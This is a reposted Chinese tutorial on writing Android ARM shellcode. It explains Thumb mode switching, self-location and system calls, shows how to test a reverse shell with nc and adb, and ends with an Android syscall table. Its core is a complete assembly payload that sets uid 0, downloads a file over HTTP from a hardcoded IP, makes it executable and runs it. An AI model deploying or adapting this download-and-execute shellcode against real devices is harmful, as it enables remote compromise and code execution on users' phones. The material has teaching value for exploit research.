zoukankan      html  css  js  c++  java
  • 【移动安全高级篇】————3、Android系统ShellCode编写

    随着Android手机的普及,Android系统安全日益受人关注。漏洞攻防是安全的一大课题,其中自然少不了shellcode的编写。本文将以提出问题、解决问题的方式教你如何编写Android系统shellcode。由于篇幅限制,本文将不对ARM指令集进行介绍,建议没有基础的读者先参考相关手册。

    基础部分

    使用什么工具?

    GNU ARM汇编器as和GNU ARM连接器ld是编写Android系统shellcode必不可少的两个工具。Android NDK提供了Cygwin、Mac和Linux版本的as和ld,为了方便在Windows环境下开发,笔者在附件中提供了Windows版本的as和ld。
    as和ld的使用方法很简单,假设sc.s是我们编写好的shellcode源文件,先使用as sc.s -o sc.o命令将sc.s汇编成目标文件sc.o,再使用ld sc.o -o sc将sc.o连接成可执行文件sc。文中用到的为数不多的as汇编伪指令将在相关注释中说明,具体请参考“Using as”手册。
    除了as和ld,我们还要用IDA作为反汇编器,IDA的使用想必不用多做介绍。用IDA记录下sc中shellcode的头部和尾部,就可以用十六进制编辑器从sc中提取shellcode了。

    函数参数如何传递?

    函数参数从左到右依次存入R0~R3,如果参数个数大于4个,则剩余参数从右到左依次入栈,返回值存入R0。

    如何给shellcode瘦身?

    ARM处理器支持两种指令集:ARM指令集和Thumb指令集。ARM指令集指令长度为32位,Thumb指令集指令长度为16位。Thumb指令集的限制更多,比如立即数大小只能在0到0xFF范围内。
    为了给shellcode瘦身,我们更倾向于使用Thumb指令集编写shellcode。ARM处理器总是从ARM指令集开始执行,所以我们的shellcode头部是一段ARM指令集程序,负责切换到Thumb指令集。

    如何自定位?

    自定位是编写shellcode的关键技术之一,也就是所谓GetPC。在x86环境下,通常有CALL GetPC、FSTENV GetPC、SEH GetPC三种方式。而在ARM环境下,事情就变得简单很多,因为指令指针PC可以直接访问。
    ARM汇编还提供了ADR伪指令,汇编器会将其转换为相对PC寻址的指令,所以我们不用担心自定位问题。值得注意的是,LDR指令通过绝对地址寻址,当基地址改变时根据重定位段信息进行重定位。用LDR指令寻址一个符号在shellcode编写中是错误的,这点和x86类似。

    如何定位函数?

    定位函数是编写shellcode的关键技术之二。在Windows环境下,通常通过PEB定位kernel32基地址,然后遍历kernel32输出表定位API。在Linux环境下,直接系统调用。
     Android系统调用由gensyscalls.py自动生成,以execve.S为例,代码如下:

    __set_syscall_errno代码如下:

    从上述代码可以看出,Android通过调用软中断,切换到特权模式,执行系统调用,r7存放系统调用号,软中断号不重要。文末将附上Android系统调用表。

    实战部分

    解决了上述问题之后,我们可以编写shellcode了,先写一个简单的Connect Back Shell,代码如下:

    使用as和ld生成可执行文件sc,下一步就是测试shellcode了。读者可以提取shellcode并利用公开的漏洞如CVE-2010-1119测试,笔者为了方便直接测试sc。
    假定我们的工作目录在D盘,使用nc -vvlp 2222命令bind到2222端口。启动另一个命令行,启动模拟器,使用adb push D:/sc /data命令将sc复制到data目录下,使用adb shell命令进到shell,使用cd /data命令进到data目录,使用chmod 777 sc命令设置sc可执行,使用./sc命令执行sc,如图1所示。sc执行后我们已经拿到shell了,如图2所示。

    编写shellcode难免出错,自然少不了调试工作,笔者建议使用IDA远程调试,方法很简单。先将IDA目录下的android_server复制到模拟器中并执行,使用adb forward tcp:23946 tcp:23946命令转发端口,使用IDA打开sc,选择Remote ARM Linux/Android debugger调试器,在Debugger/Debugger options…中勾选Stop on debugging start,在Debugger/ Process options…中填Hostname为localhost,就可以F9开始调试了,如图3所示。

    最后我们编写一个HTTP下载执行的shellcode,代码如下:

    .globl _start
    .align 2
    _start:
    .code 32
      adr r0, thumb + 1
      bx r0
    thumb:
    .code 16
      mov r0, #0
      mov r7, #213
      swi #0 @setuid32(0)
      @创建文件
      mov r2, #0x1C
      lsl r2, #4 @S_IRWXU
      mov r1, #0x24
      lsl r1, #4
      add r1, r1, #1 @O_CREAT|O_WRONLY|O_TRUNC
      adr r0, name
      mov r7, #5
      swi #0 @int fd = open(name, O_CREAT|O_WRONLY|O_TRUNC, S_IRWXU)
      mov r4, r0
      mov r2, #6 @IPPROTO_TCP
      mov r1, #1 @SOCK_STREAM
      mov r0, #2 @AF_INET
      mov r7, #250
      add r7, #31
      @建立连接
      swi #0 @int sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
      mov r5, r0
      mov r2, #16
      adr r1, addr
      mov r7, #250
      add r7, #33
      swi #0 @connect(sock, addr, 16)
      @计算http头长度
      adr r2, head
      mov r1, r2
      b L1
    L0:
      add r2, r2, #1
    L1:
      ldrb r0, [r2]
      cmp r0, #0
      bne L0
      sub r2, r2, r1
      mov r0, r5
      mov r7, #4
      swi #0 @write(sock, head, strlen(head))
      @跳过http头
      mov r3, #0
      adr r6, nrnr
      ldr r6, [r6]
    L2:
      mov r2, #252
      sub sp, sp, #252
      mov r1, sp
      mov r0, r5
      mov r7, #3
      push {r3}
      swi #0 @int len = read(sock, buf, 252)
      pop {r3}
      cmp r0, #0
      ble L7
      mov r2, #0
    L3:
      lsl r3, r3, #8
      mov r1, sp
      add r1, r2
      ldrb r1, [r1]
      add r3, r3, r1
      add r2, r2, #1
      cmp r3, r6
      beq L4
      cmp r2, r0
      bne L3
      add sp, sp, #252
      b L2
    L4:
      mov r1, sp
      add r1, r2
      sub r2, r0, r2
      b L6
      @写入文件
    L5:
      mov r2, #252
      sub sp, sp, #252
      mov r1, sp
      mov r0, r5
      mov r7, #3
      swi #0 @int len = read(sock, buf, 252)
      cmp r0, #0
      ble L7
      mov r2, r0  
      mov r1, sp
    L6:  
      mov r0, r4
      mov r7, #4
      swi #0 @write(fd, buf, len)
      add sp, sp, #252
      b L5
    L7:
      add sp, sp, #252
      mov r0, r5
      mov r7, #6 
      swi #0 @close(sock)
      mov r0, r4
      swi #0 @close(fd)
      @执行文件
      mov r1, #0x1C
      lsl r1, #4 @S_IRUSR|S_IWUSR|S_IXUSR
      adr r0, name
      mov r7, #15
      swi #0 @chmod(name, S_IRUSR|S_IWUSR|S_IXUSR)
      mov r2, #0
      mov r1, #0
      push {r1}
      adr r0, name
      push {r0} @argv[0]
      mov r1, sp @argv
      mov r7, #11
      swi #0 @execve(name, argv, NULL)
      mov r0, #0
      mov r7, #1
      swi #0 @exit(0)
    addr:
      .short 2 @AF_INET
      .ascii "x00x50" @port
      .byte 202, 120, 2, 102 @ip
      .zero 8
    head:
      .ascii "GET /"
      .ascii "" @file
      .ascii " HTTP/1.1
    "
      .ascii "HOST: "
      .ascii "www.android.com" @host
      .ascii "
    
    x00"
      .zero 2
    name:
      .asciz "xxx"
    nrnr:
      .ascii "
    
    
    "

    Android系统调用表

    1  exit  2  fork
    3  read  4  write
    5  open  6  close
    9  link  10  unlink
    11  execve  12  chdir
    14  mknod  15  chmod
    19  lseek  20  getpid
    21  mount  26  ptrace
    29  pause  33  access
    36  sync  38  rename
    39  mkdir  40  rmdir
    41  dup  42  pipe
    43  times  45  brk
    51  acct  52  umount2
    54  ioctl  55  fcntl
    57  setpgid  60  umask
    61  chroot  63  dup2
    64  getppid  66  setsid
    67  sigaction  72  sigsuspend
    73  sigpending  75  setrlimit
    77  getrusage  78  gettimeofday
    79  settimeofday  83  symlink
    85  readlink  88  reboot
    91  munmap  92  truncate
    93  ftruncate  94  fchmod
    96  getpriority  97  setpriority
    103  syslog  103  syslog
    104  setitimer  105  getitimer
    114  wait4  116  sysinfo
    118  fsync  120  clone
    122  uname  125  mprotect
    126  sigprocmask  128  init_module
    129  delete_module  132  getpgid
    133  fchdir  140  _llseek
    142  _newselect  143  flock
    144  msync  145  readv
    146  writev  148  fdatasync
    150  mlock  151  munlock
    154  sched_setparam  155  sched_getparam
    156  sched_setscheduler  157  sched_getscheduler
    158  sched_yield  159  sched_get_priority_max
    160  sched_get_priority_min  161  sched_rr_get_interval
    162  nanosleep  163  mremap
    168  poll  172  prctl
    174  rt_sigaction  175  rt_sigprocmask
    177  rt_sigtimedwait  180  pread64
    181  pwrite64  183  getcwd
    184  capget  185  capset
    186  sigaltstack  187  sendfile
    190  vfork  191  ugetrlimit
    192  mmap2  195  stat64
    196  lstat64  197  fstat64
    198  lchown32  199  getuid32
    200  getgid32  201  geteuid32
    202  getegid32  203  setreuid32
    204  setregid32  205  getgroups32
    206  setgroups32  207  fchown32
    208  setresuid32  209  getresuid32
    210  setresgid32  211  getresgid32
    212  chown32  213  setuid32
    214  setgid32  217  getdents64
    219  mincore  220  madvise
    221  fcntl64  224  gettid
    240  futex  248  exit_group
    250  epoll_create  251  epoll_ctl
    252  epoll_wait  257  timer_create
    258  timer_settime  259  timer_gettime
    260  timer_getoverrun  261  timer_delete
    262  clock_settime  263  clock_gettime
    264  clock_getres  265  clock_nanosleep
    266  statfs64  267  fstatfs64
    269  utimes  280  waitid
    281  socket  282  bind
    283  connect  284  listen
    285  accept  286  getsockname
    287  getpeername  288  socketpair
    290  sendto  292  recvfrom
    293  shutdown  294  setsockopt
    295  getsockopt  296  sendmsg
    297  recvmsg  314  ioprio_set
    315  ioprio_get  316  inotify_init
    317  inotify_add_watch  318  inotify_rm_watch
    322  openat  323  mkdirat
    325  fchownat  327  fstatat64
    328  unlinkat  329  renameat
    333  fchmodat  356  eventfd2
    359  pipe2  983042  ARM_cacheflush
    983045  ARM_set_tls    

    CVE-2010-1119,其中shellcode为sc1.s

    原文:https://bbs.pediy.com/thread-155774.htm

    总会有不期而遇的温暖. 和生生不息的希望。
  • 相关阅读:
    寒假学习10
    寒假学习9
    寒假学习8
    寒假学期7
    寒假学习6
    寒假学习5
    寒假学习4
    Notification通知栏的使用
    Service的使用
    BroadcastReceive的使用
  • 原文地址:https://www.cnblogs.com/devi1/p/13486470.html
Copyright © 2011-2022 走看看